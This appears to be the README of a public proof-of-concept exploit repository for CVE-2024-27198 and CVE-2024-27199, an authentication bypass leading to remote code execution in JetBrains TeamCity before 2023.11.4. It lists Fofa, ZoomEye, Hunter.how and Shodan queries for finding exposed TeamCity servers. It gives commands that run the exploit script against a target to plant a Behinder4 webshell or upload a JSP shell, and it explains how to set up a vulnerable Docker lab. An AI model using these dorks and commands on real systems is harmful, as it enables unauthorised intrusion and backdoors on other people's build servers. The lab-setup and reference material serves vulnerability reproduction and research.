来源

关联漏洞

描述

CVE-2024-27198 & CVE-2024-27199 Authentication Bypass --> RCE in JetBrains TeamCity Pre-2023.11.4

介绍

# Cyberspace Mapping Dork

## Fofa

```
app="JET_BRAINS-TeamCity"
```

## ZoomEye

```
app:"JetBrains TeamCity"
```

## Hunter.how

```
product.name="TeamCity"
```

## Shodan

```
http.component:"teamcity"
```

# How to use

I'm using `Python3.9`.

```shell
pip install requests urllib3 faker
python CVE-2024-27198-RCE.py -t http://192.168.198.173:8111 --behinder4
# python CVE-2024-27198-RCE.py -t http://192.168.198.173:8111 -f shell.jsp
```

![](https://raw.githubusercontent.com/W01fh4cker/blog_image/main/image-20240311155702623.png)

![](https://raw.githubusercontent.com/W01fh4cker/blog_image/main/image-20240311132654487.png)

also:

```shell
python CVE-2024-27198-RCE.py -t http://192.168.198.173:8111
```

![](https://raw.githubusercontent.com/W01fh4cker/blog_image/main/image-20240311132752687.png)

# Vulnerability recurrence environment construction

Use docker to pull the vulnerable image and start it:

```shell
sudo docker pull jetbrains/teamcity-server:2023.11.3
sudo docker run -it -d --name teamcity -u root -p 8111:8111 jetbrains/teamcity-server:2023.11.3
# sudo ufw disable
```

Then make basic settings:

![](https://raw.githubusercontent.com/W01fh4cker/blog_image/main/image-20240307232348600.png)

![](https://raw.githubusercontent.com/W01fh4cker/blog_image/main/image-20240307232404056.png)



# Reference

https://www.rapid7.com/blog/post/2024/03/04/etr-cve-2024-27198-and-cve-2024-27199-jetbrains-teamcity-multiple-authentication-bypass-vulnerabilities-fixed/

https://github.com/Chocapikk/CVE-2024-27198

文件快照

 [4.0K]  /data/pocs/f87b6cd7776cc8e7e9d9e851e5eadd417d150626
├── [ 21K]  CVE-2024-27198-RCE.py
└── [1.5K]  README.md

0 directories, 2 files

备注